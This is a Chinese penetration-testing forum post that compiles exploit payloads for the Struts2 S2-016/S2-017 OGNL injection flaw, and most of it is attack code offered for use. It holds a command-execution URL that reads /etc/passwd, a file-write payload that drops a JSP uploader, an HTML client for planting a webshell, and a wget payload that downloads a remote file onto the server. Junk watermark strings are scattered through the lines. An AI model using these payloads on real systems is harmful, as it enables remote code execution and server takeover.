中国网络渗透测试联盟

标题: Struts2 S2-016/S2-017漏洞执行代码 [打印本页]
作者: admin    时间: 2013-7-18 23:03
标题: Struts2 S2-016/S2-017漏洞执行代码
大家都发了,,我就整理了一下。友情提示,自己小命比shell重要哦。。% Q8 P6 p# w9 B$ Z4 I1 h  ]

1 j4 q! {+ w8 K$ b, f喜欢就点一下感谢吧^_^  f# w& v+ G! t* M' m) Z
, R' D* j3 s+ j% X
带回显命令执行:3 Q. U# {7 y6 c

$ {  i6 h/ o1 j, I: ^/ D( ]( h/ ]http://www.example.com/struts2-blank/example/X.action?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
. f& W% L( N9 R+ D
' R' v( h7 ^1 X4 e$ a  l7 r/ c3 C5 S0 |) Y
) h4 N2 O5 e3 i! t5 K
$ n4 T  W; j6 ]) W. Z2 U" {  ~
# x+ ^* e0 [/ m9 t) O
* _  ~4 ^* d* {0 _' u; l& L
) b( g* D% U, s4 E# I2 l& S; a+ @' q2 F
爆路径:
( q5 E$ ]) |' k
6 i+ Z6 c) m6 m* Qhttp://www.example.com/struts2-b ... 8%29.close%28%29%7D
% I( B; M) }' P2 u, D- c; ?0 c3 D
: j9 n5 ^1 \0 @  B0 V1 Z) u/ @5 X3 G: `  ~: d8 k( i* v3 K
' y* _: h# S4 D( |' r# ?
8 d$ f4 g7 Y' U) D# w3 i
  ], R  P7 k' U6 V& L+ b1 |* x
写文件:0 w& w. ]! w) ]& u! ?
5 z. m# v5 P& x: h3 P
http://www.example.com/struts2-blank/example/X.action?redirect:${
# N2 ~: x" ^. U/ i0 @' b: C, |, o; s' I- H( m) f
%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),* |8 H; [" b/ V+ D, x% n; O$ B$ ]

/ a- ?+ X, n- C, r, J7 ]%23p%3d(%23req.getRealPath(%22/%22)%2b%22css3.jsp%22).replaceAll("\\\\", "/"),; r) P3 i' ]* O. \

  g$ J- g0 ~0 Q7 F  e5 q- |  Anew+java.io.BufferedWriter(new+java.io.FileWriter(%23p)).append(%23req.getParameter(%22c%22)).close(), @8 N4 w- \! K
( }. h  C; }; j- n0 _0 J0 w" |! d7 c( B
}&c=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3e+ @1 p* q' r: F3 [) A

% @4 u9 o* o2 P' q) }9 M1 l
& n+ U4 I+ h. E5 h$ }; f, m3 z1 r* R$ Z& p  J5 q
写入的文件内容:
. D2 a$ F( G- U  p# q7 i& q! P
; O& T  v( _( W8 ?% E<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>      * w5 F: A+ ^, [& A6 i8 s

9 H  h) H9 S% z- q其实就是一个jsp的小马,需要客户端配合                                                                                  , @* q* G8 v/ N4 |# ~

4 ~2 L& e2 q2 b+ s4 Y# z函数f是文件名,t是内容* k. Q" S; U" Z( }) u8 j

- f% E: @( q3 E, o" C客户端:! u6 W, T1 J; D: y  i# M: a) `
& M/ X5 E4 M" d' B* t
<form action="http://www.example.com/struts2-blank/example/css3.jsp?f=fjp.jsp" method="post">9 Y% b, I1 M& g) z

( e# L; F* @) {' X<textarea name=t cols=120 rows=10 width=45>your code</textarea>. t, i. Z3 o' _+ e% y

# ?  J8 E6 ~) l4 c* R5 S<center>% k* W' \1 o; T2 ]9 D: F5 \6 i6 N" J
- g* ]* W0 f' A& a- e) u4 R8 p

5 l8 T& v' f' G6 g- e+ [, a; B; a
<input type=submit value="提交">
  J, d% n) [7 ]- u- c/ r) P. ]0 Y0 }; X
</form>" P3 o. N4 H  u2 }
3 `( b1 y( b0 P0 H
就在当前目录建立一个fjp.jsp4 Z& @* n7 i' x7 O
) v. C: z, L8 \& s  |* H
shell:http://www.example.com/struts2-blank/example/fjp.jsp$ P0 W( a! h$ {8 Y: c. o
7 Y9 ~) K1 g6 m; X0 {/ U+ x& u8 i: j

% O- a5 s* F0 h) M6 {
8 r* m7 F9 z! M. o% x/ w还有@园长的一个客户端:
5 c: r' y* K# c. A9 s" z
7 A# C6 P8 ^( C6 x9 x2 \: j<html>- p, ]4 q; S' M5 H8 ~/ G. q0 l* i
( n4 u5 m" k2 r) u' R* i9 j: c- ?, R6 {
<head>
. T) u( N6 D9 V9 e& q$ k; V" n
; o6 Z* C& q4 }<meta http-equiv="content-type" content="text/html;charset=utf-8"># k% _) M0 Y3 _

0 i8 a  C/ c# Y2 n<title>jsp-园长</title>7 I' s( p+ H3 }. _3 o/ \( w, ^
. @6 H( m; D3 N2 c" Q" t3 u
</head>, z0 u" G9 x9 r5 ]  Y' e  ]

' d' q: K% u* R: _9 u9 Z- a6 J<style>( k" R3 s( I  g: E) R2 p

, e* @$ F  r& _1 |. `.main{width:980px;height:600px;margin:0 auto;}% f7 S9 S+ Y% @' K1 s. {, n
/ u: t0 Q7 l" c% V5 ~7 {: T  U
.url{width:300px;}% l8 N) h- I! |: }4 W& @& e! |

. l6 i' A/ l1 g9 ~5 o. u.fn{width:60px;}9 l6 s" K4 @5 L$ ?* A4 t' m) W; w
: E5 k) `) [7 E
.content{width:80%;height:60%;}
( ~5 C* p( E+ Z* \- B. S/ U$ h6 E: e/ _8 V
</style>) Y; C% O0 {, a/ c$ R

' I4 d4 V" s  Q$ M1 o: W, g/ o; W<script>
8 n9 a0 U5 {& x! O) c
6 S; R; {4 y" u9 ~* N  function upload(){0 ]5 X  A# [/ y' I6 a6 M- K' G

6 v6 U( ~) M; H/ _* N: q    var url = document.getElementById('url').value,) Q0 q; |3 N1 g( V5 y* Z* k" n4 b6 b

# l8 t7 i3 n8 q% y1 L# y      content = document.getElementById('content').value,
4 k+ ^: r' y" ^6 b) @9 k: u: K" W7 ]
2 R* Z( Q# Q/ |: T      fileName = document.getElementById('fn').value,
8 t  a6 h6 I2 ?: U8 }9 v8 R3 d: P
      form = document.getElementById('fm');
. t: o/ m, O7 z2 a: N, s
/ l. J5 ~# G) e5 W3 b0 {    if(url.length == 0){
& q( C% M+ ~, W$ X% ?2 K' X' q
7 z$ B$ Y  `7 w! U9 h+ q      alert("Url not allowd empty!");
/ H% C+ a, k0 W) E8 i; A
2 o- Z1 Z' `$ g/ k# Z# t# [: k      return ;! @, V1 `% h7 u

" v" p% `' T' |) O1 z, ^    }
+ v7 q2 |! ^  R4 z) F+ N1 D* J& l5 x, P/ F. n
    if(content.length == 0){" S1 E5 p: W+ u! a4 a

; B4 j2 b  L0 o4 i8 `      alert("Content not allowd empty!");
" D* s/ H3 v) S% r5 S' g8 S3 a# I1 o5 S5 n5 v4 B" c! G
      return ;
, V# a* x3 Z3 }8 d4 a- ]
. K  L. J2 H+ Q# k    }( B. u; i5 ?; p$ C! X% g

: L9 V7 t& m# n* ?' P    if(fileName.length == 0){+ i. T6 `1 S2 a; u2 r4 O
/ O8 ?1 W8 J* @1 v
      alert("FileName not allowd empty!");
4 w( l; P8 c3 q6 M: ^0 d" d" j0 d2 Z, d& Q+ v
      return ;( v; G" y6 {$ ^3 C" G0 J

, W0 m6 ~3 ^9 n* T! ?/ m    }
: E' {+ I) }  c6 F" B5 n6 n6 G
" x  T. ]. s( m, X* u& F: e) q    form.action = url;" V/ m0 r% d, F4 [6 O# [) z8 y9 d
. e! N  Y) g' p7 |& c5 t
    form.submit();
* g* R$ \- }8 q2 M9 V% F* q: Y! Z  L9 O' ~! h
  }5 z* N* }$ }  x% ?0 F9 q0 s

" H8 M, G6 z. e" C5 W4 Z: g</script>8 e' E1 k5 ~- _

) ^" M/ o8 @5 w; a<body>
  a2 e; F3 M1 h/ k
! d% v% G1 h! U, L9 ~<div class="main">- ]" G4 J) O: @$ r

# ]* q! T  E. ]+ e$ i' e6 [+ V1 ^# M) D  <form id="fm" method="post">  
7 N3 h4 V3 w4 L5 _9 e
% k: W) e6 {6 F7 t    URL:<input type="text" value="http://localhost/Struts2/css3.jsp" class="url" id="url"/>  + ^1 E- }9 ^1 _# l: B( b8 J
1 d& E7 ^+ c" [
    FileName:<input type="text" name="f" value="css.jsp" class="fn" id="fn" />  & ~5 _2 i/ j9 ]& @0 b
) ~( n5 K& v; Q0 K5 L: p
    <a href="javascript:upload();">Upload</a>. H) j0 h5 J1 M6 z
. Y1 k/ q+ z! o3 z. Q
5 Z. S' e2 ^$ g9 n) B
! h, p. v3 ^! E  {- ^3 J
    <textarea id="content" class="content" name="t" ></textarea>
4 X. ^( I: p9 ?2 T+ Y$ e/ V& }9 E3 S* T* B: f* g
  </form>
* D* k% r# F" l* t9 b( v% j' L: J# Y
</div>6 m; G: E& i. A/ V5 z
2 m- `9 M: |% `- e, x
</body>
3 Q) @4 V; k: e% r& w: c3 g' G. o7 A% h# ^/ f( Y
</html>8 i* n; E$ d1 {4 `

7 Y, f( k, q! X8 M( \+ Q6 `; ^9 J2 \9 y2 [, w! x$ t* X
8 _7 U# b2 h1 w4 U
还有@X发的一个wget的getshell* ^8 F5 @' h/ S) J  x
; F' c2 K. t/ g/ j  P, c  S0 k- a/ c
?redirect{%23a%3d(new  java.lang.ProcessBuilder(new java.lang.String[]{'wget','http://www.url.com/xx.txt','- O','/root/1.jsp'}  V. I4 F6 U& n! J2 H3 `4 y

3 s) o0 b0 O8 w# z4 M)).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b), %23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e), %23piaoye%3d%23context.get ('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23piaoye.getWriter().println (%23e),%23piaoye.getWriter().flush(),%23piaoye.getWriter().close()}
! A+ _8 A  ]% I9 ?# ]5 M* a* B- r复制代码



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2